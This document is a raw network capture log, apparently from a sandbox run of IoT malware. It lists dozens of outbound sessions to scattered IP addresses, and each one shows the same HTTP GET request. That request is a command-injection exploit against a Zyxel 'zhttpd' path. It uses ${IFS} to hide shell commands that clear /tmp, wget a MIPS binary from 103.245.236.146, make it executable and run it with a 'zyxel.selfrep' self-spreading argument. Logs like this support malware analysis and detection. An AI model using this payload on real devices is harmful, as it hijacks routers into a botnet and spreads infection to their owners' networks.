                                              Jan 29, 2024 07:03:55.113571882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5639192.168.2.14472588.187.187.39443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.113617897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5640192.168.2.1459474140.244.93.45443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.113643885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5641192.168.2.143755642.251.135.68443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.113686085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5642192.168.2.1442236113.121.169.204443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.113730907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5643192.168.2.1438342219.45.108.107443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.113768101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5644192.168.2.1445606104.73.119.97443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.113799095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5645192.168.2.145741458.76.178.61443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.113842010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5646192.168.2.1455960105.197.170.187443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.113913059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5647192.168.2.145427247.212.80.167443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.113919973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5648192.168.2.146035488.83.105.229443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.113936901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5649192.168.2.145243043.8.31.59443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.113995075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5650192.168.2.144172614.60.174.168443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.114048004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5651192.168.2.143360468.78.96.254443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.114097118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5652192.168.2.1455422217.242.92.174443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.114132881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5653192.168.2.145996663.78.9.220443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.114168882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5654192.168.2.1456790100.128.164.195443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.114202023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5655192.168.2.1444670147.145.188.248443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.114253044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5656192.168.2.143503887.35.13.23443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.114274979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5657192.168.2.144448618.144.87.52443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.114300966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5658192.168.2.145412424.27.212.52443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.114336014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5659192.168.2.1451032105.13.7.97443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.114387035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5660192.168.2.1451172142.117.8.253443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.114415884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5661192.168.2.1444462175.32.56.227443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.114478111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5662192.168.2.1455744216.249.29.45443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.114497900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5663192.168.2.1441092107.229.52.241443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.114545107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5664192.168.2.144475854.73.60.145443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.114561081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5665192.168.2.144119460.149.165.39443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.114738941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5666192.168.2.145950414.123.125.195443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.114765882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5667192.168.2.143306813.127.111.243443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.114784956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5668192.168.2.1458844121.29.119.199443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.114830971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5669192.168.2.143682064.42.108.204443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.114861012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5670192.168.2.1460614157.15.170.168443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.114913940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5671192.168.2.143597235.157.93.153443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.114931107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5672192.168.2.1435198198.64.39.81443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.114990950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5673192.168.2.1444722195.100.209.40443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.115019083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5674192.168.2.1458490119.134.235.33443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.115052938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5675192.168.2.144441695.60.179.37443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.115082979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5676192.168.2.1455496147.41.36.30443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.115123987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5677192.168.2.14481704.88.86.80443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.115149021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5678192.168.2.143678671.20.215.239443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.115207911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5679192.168.2.1444498189.231.146.27443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.115232944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5680192.168.2.143486844.126.155.118443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.115266085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5681192.168.2.145611689.209.241.170443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.115314007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5682192.168.2.14354129.21.242.100443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.115353107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5683192.168.2.143944269.156.92.160443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.115391970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5684192.168.2.1444806107.86.17.165443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.115449905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5685192.168.2.145446089.208.53.40443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.115483046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5686192.168.2.1459666130.176.253.99443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.115500927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5687192.168.2.1436050146.242.63.240443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.115571022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5688192.168.2.1434476134.184.211.66443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.115600109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5689192.168.2.1445786218.2.217.209443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.115641117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5690192.168.2.1442408134.41.237.252443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.115669966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5691192.168.2.1439930138.109.98.195443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.115700006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5692192.168.2.1433998141.65.125.107443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.115731001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5693192.168.2.144365687.53.22.107443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.115794897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5694192.168.2.145611812.232.132.245443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.115832090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5695192.168.2.1436732209.227.66.15443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.115868092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5696192.168.2.145723093.49.59.200443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.115907907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5697192.168.2.1446658201.98.20.189443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.115958929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5698192.168.2.144269087.102.147.111443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.115984917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5699192.168.2.1438318139.159.80.2443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.116051912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5700192.168.2.1460316134.43.215.39443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.116066933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5701192.168.2.144056892.55.56.67443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:55.116102934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5702192.168.2.144963486.91.114.148443
                                              TimestampBytes transferredDirectionData
